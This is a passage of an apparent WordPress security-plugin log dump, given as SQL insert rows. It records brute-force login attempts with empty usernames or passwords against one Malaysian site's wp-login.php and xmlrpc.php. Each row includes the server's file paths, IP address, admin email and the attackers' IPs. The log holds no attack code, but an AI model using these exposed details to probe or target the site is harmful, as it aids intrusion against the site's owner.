Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"40846\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBJNGkPXSyJlCUJQmpXlwAAAYo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568688436.9954\";s:12:\"REQUEST_TIME\";s:10:\"1568688436\";}}','notice','2019-09-17 02:47:18','2019-09-17 02:47:17',18257272,19556376,'https://bintara.com.my/xmlrpc.php',1,0,'103.15.226.14'),(24356,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"36794\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBJRGkPXSyJlCUJQmpXpQAAAZE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568688453.0167\";s:12:\"REQUEST_TIME\";s:10:\"1568688453\";}}','notice','2019-09-17 02:47:34','2019-09-17 02:47:33',17739680,19231440,'https://bintara.com.my/wp-login.php',1,0,'148.72.23.181'),(24357,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"37350\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBJR2kPXSyJlCUJQmpXqwAAAYg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568688456.0813\";s:12:\"REQUEST_TIME\";s:10:\"1568688456\";}}','notice','2019-09-17 02:47:37','2019-09-17 02:47:36',18257272,19556376,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.23.181'),(24358,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.84.180.90\";s:11:\"REMOTE_PORT\";s:5:\"51732\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBMYNVIJ66zPtjtaf3yeQAAAUI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568689248.8302\";s:12:\"REQUEST_TIME\";s:10:\"1568689248\";}}','notice','2019-09-17 03:00:50','2019-09-17 03:00:49',17744296,19230304,'https://bintara.com.my/wp-login.php',1,0,'185.84.180.90'),(24359,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.84.180.90\";s:11:\"REMOTE_PORT\";s:5:\"51732\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBMYNVIJ66zPtjtaf3yeQAAAUI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568689248.8302\";s:12:\"REQUEST_TIME\";s:10:\"1568689248\";}}','notice','2019-09-17 03:00:50','2019-09-17 03:00:49',17905384,19230304,'https://bintara.com.my/wp-login.php',1,0,'185.84.180.90'),(24360,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.84.180.90\";s:11:\"REMOTE_PORT\";s:5:\"52190\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBMY2kPXSyJlCUJQmpZmgAAAY0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568689251.6601\";s:12:\"REQUEST_TIME\";s:10:\"1568689251\";}}','notice','2019-09-17 03:00:53','2019-09-17 03:00:52',18256536,19554744,'https://bintara.com.my/xmlrpc.php',1,0,'185.84.180.90'),(24361,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"142.4.1.222\";s:11:\"REMOTE_PORT\";s:5:\"59292\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBMzdK-omY048@iBsMoQAAAANg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568689357.5865\";s:12:\"REQUEST_TIME\";s:10:\"1568689357\";}}','notice','2019-09-17 03:02:39','2019-09-17 03:02:38',17739640,19230296,'https://bintara.com.my/wp-login.php',1,0,'142.4.1.222'),(24362,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"142.4.1.222\";s:11:\"REMOTE_PORT\";s:5:\"59968\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBM0NVIJ66zPtjtaf3ypgAAAUs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568689360.5771\";s:12:\"REQUEST_TIME\";s:10:\"1568689360\";}}','notice','2019-09-17 03:02:41','2019-09-17 03:02:40',18257080,19557008,'https://bintara.com.my/xmlrpc.php',1,0,'142.4.1.222'),(24363,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"35.188.77.30\";s:11:\"REMOTE_PORT\";s:5:\"59756\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBOtWkPXSyJlCUJQmpbOgAAAZU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568689845.4154\";s:12:\"REQUEST_TIME\";s:10:\"1568689845\";}}','notice','2019-09-17 03:10:46','2019-09-17 03:10:45',17739616,19230552,'https://bintara.com.my/wp-login.php',1,0,'35.188.77.30'),(24364,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 